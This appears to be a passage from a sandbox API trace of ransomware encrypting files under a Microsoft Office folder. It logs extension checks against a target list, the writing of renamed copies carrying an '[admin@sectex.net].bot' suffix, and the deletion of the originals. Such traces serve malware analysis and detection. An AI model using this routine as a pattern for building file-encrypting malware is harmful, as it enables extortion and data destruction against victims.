	[0145.988] lstrlenW (lpString=".xlsx") returned 5
	[0145.988] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0145.988] lstrlenW (lpString=".ppt") returned 4
	[0145.988] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString=".zip") returned 4
	[0145.988] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0145.988] lstrlenW (lpString=".rar") returned 4
	[0145.988] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0145.988] lstrlenW (lpString=".bz2") returned 4
	[0145.988] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0145.988] lstrlenW (lpString=".7z") returned 3
	[0145.988] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString=".dbf") returned 4
	[0145.988] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString=".1cd") returned 4
	[0145.988] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString=".jpg") returned 4
	[0145.988] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.988] lstrlenW (lpString=".doc") returned 4
	[0145.988] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0145.988] lstrlenW (lpString=".docx") returned 5
	[0145.988] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0145.989] lstrlenW (lpString=".pdf") returned 4
	[0145.989] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0145.989] lstrlenW (lpString=".xls") returned 4
	[0145.989] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0145.989] lstrlenW (lpString=".xlsx") returned 5
	[0145.989] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0145.989] lstrlenW (lpString=".ppt") returned 4
	[0145.989] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0145.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.989] lstrlenW (lpString=".zip") returned 4
	[0145.989] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0145.989] lstrlenW (lpString=".rar") returned 4
	[0145.989] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0145.989] lstrlenW (lpString=".bz2") returned 4
	[0145.989] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0145.989] lstrlenW (lpString=".7z") returned 3
	[0145.989] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0145.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.989] lstrlenW (lpString=".dbf") returned 4
	[0145.989] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0145.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.989] lstrlenW (lpString=".1cd") returned 4
	[0145.989] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0145.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.989] lstrlenW (lpString=".jpg") returned 4
	[0145.989] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0145.990] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0145.990] lstrlenW (lpString="GROOVE_F_COL.HXK") returned 16
	[0145.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.990] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=111) returned 1
	[0145.990] CloseHandle (hObject=0x3ac) returned 1
	[0145.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 0x20
	[0145.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.991] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.991] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.991] GetLastError () returned 0x0
	[0145.991] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x6f, lpOverlapped=0x0) returned 1
	[0145.993] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x70, lpOverlapped=0x0) returned 1
	[0145.994] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.994] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0145.994] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.994] CloseHandle (hObject=0x3d4) returned 1
	[0145.994] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.994] SetEndOfFile (hFile=0x3ac) returned 1
	[0145.996] CloseHandle (hObject=0x3ac) returned 1
	[0145.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 1
	[0145.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.998] lstrlenW (lpString=".doc") returned 4
	[0145.998] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.998] lstrlenW (lpString=".docx") returned 5
	[0145.998] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.998] lstrlenW (lpString=".pdf") returned 4
	[0145.998] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.998] lstrlenW (lpString=".xls") returned 4
	[0145.998] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.998] lstrlenW (lpString=".xlsx") returned 5
	[0145.999] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0145.999] lstrlenW (lpString=".ppt") returned 4
	[0145.999] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString=".zip") returned 4
	[0145.999] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString=".rar") returned 4
	[0145.999] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString=".bz2") returned 4
	[0145.999] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0145.999] lstrlenW (lpString=".7z") returned 3
	[0145.999] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString=".dbf") returned 4
	[0145.999] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString=".1cd") returned 4
	[0145.999] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString=".jpg") returned 4
	[0145.999] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0145.999] lstrlenW (lpString=".doc") returned 4
	[0145.999] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.999] lstrlenW (lpString=".docx") returned 5
	[0145.999] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.999] lstrlenW (lpString=".pdf") returned 4
	[0145.999] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString=".xls") returned 4
	[0145.999] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.999] lstrlenW (lpString=".xlsx") returned 5
	[0146.000] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.000] lstrlenW (lpString=".ppt") returned 4
	[0146.000] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0146.000] lstrlenW (lpString=".zip") returned 4
	[0146.000] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.000] lstrlenW (lpString=".rar") returned 4
	[0146.000] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.000] lstrlenW (lpString=".bz2") returned 4
	[0146.000] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.000] lstrlenW (lpString=".7z") returned 3
	[0146.000] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0146.000] lstrlenW (lpString=".dbf") returned 4
	[0146.000] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0146.000] lstrlenW (lpString=".1cd") returned 4
	[0146.000] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64
	[0146.000] lstrlenW (lpString=".jpg") returned 4
	[0146.000] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.000] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0146.000] lstrlenW (lpString="GROOVE_K_COL.HXK") returned 16
	[0146.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.004] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=110) returned 1
	[0146.004] CloseHandle (hObject=0x3ac) returned 1
	[0146.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 0x20
	[0146.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.004] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.005] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.005] GetLastError () returned 0x0
	[0146.005] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x6e, lpOverlapped=0x0) returned 1
	[0146.006] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x70, lpOverlapped=0x0) returned 1
	[0146.007] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.007] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0146.007] SetEndOfFile (hFile=0x3d4) returned 1
	[0146.007] CloseHandle (hObject=0x3d4) returned 1
	[0146.007] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.008] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.012] CloseHandle (hObject=0x3ac) returned 1
	[0146.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.013] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 1
	[0146.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.013] lstrlenW (lpString=".doc") returned 4
	[0146.013] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.013] lstrlenW (lpString=".docx") returned 5
	[0146.013] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.013] lstrlenW (lpString=".pdf") returned 4
	[0146.013] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.013] lstrlenW (lpString=".xls") returned 4
	[0146.013] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.013] lstrlenW (lpString=".xlsx") returned 5
	[0146.013] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.013] lstrlenW (lpString=".ppt") returned 4
	[0146.014] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString=".zip") returned 4
	[0146.014] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString=".rar") returned 4
	[0146.014] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString=".bz2") returned 4
	[0146.014] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.014] lstrlenW (lpString=".7z") returned 3
	[0146.014] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString=".dbf") returned 4
	[0146.014] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString=".1cd") returned 4
	[0146.014] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString=".jpg") returned 4
	[0146.014] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.014] lstrlenW (lpString=".doc") returned 4
	[0146.014] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.014] lstrlenW (lpString=".docx") returned 5
	[0146.014] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.014] lstrlenW (lpString=".pdf") returned 4
	[0146.014] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString=".xls") returned 4
	[0146.014] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.014] lstrlenW (lpString=".xlsx") returned 5
	[0146.014] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.014] lstrlenW (lpString=".ppt") returned 4
	[0146.014] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.015] lstrlenW (lpString=".zip") returned 4
	[0146.015] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.015] lstrlenW (lpString=".rar") returned 4
	[0146.015] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.015] lstrlenW (lpString=".bz2") returned 4
	[0146.015] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.015] lstrlenW (lpString=".7z") returned 3
	[0146.015] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.015] lstrlenW (lpString=".dbf") returned 4
	[0146.015] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.015] lstrlenW (lpString=".1cd") returned 4
	[0146.015] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64
	[0146.015] lstrlenW (lpString=".jpg") returned 4
	[0146.015] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.015] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0146.015] lstrlenW (lpString="HVAC.VSL") returned 8
	[0146.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.016] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=36200) returned 1
	[0146.016] CloseHandle (hObject=0x3ac) returned 1
	[0146.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 0x20
	[0146.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.017] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.017] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0146.017] GetLastError () returned 0x0
	[0146.017] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x8d68, lpOverlapped=0x0) returned 1
	[0146.088] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x8d70, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x8d70, lpOverlapped=0x0) returned 1
	[0146.090] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.090] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0146.090] SetEndOfFile (hFile=0x3d4) returned 1
	[0146.090] CloseHandle (hObject=0x3d4) returned 1
	[0146.090] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.090] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.093] CloseHandle (hObject=0x3ac) returned 1
	[0146.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.115] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 1
	[0146.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.120] lstrlenW (lpString=".doc") returned 4
	[0146.120] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0146.120] lstrlenW (lpString=".docx") returned 5
	[0146.120] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0146.120] lstrlenW (lpString=".pdf") returned 4
	[0146.120] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0146.120] lstrlenW (lpString=".xls") returned 4
	[0146.120] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0146.120] lstrlenW (lpString=".xlsx") returned 5
	[0146.120] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0146.120] lstrlenW (lpString=".ppt") returned 4
	[0146.120] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0146.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.120] lstrlenW (lpString=".zip") returned 4
	[0146.120] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0146.120] lstrlenW (lpString=".rar") returned 4
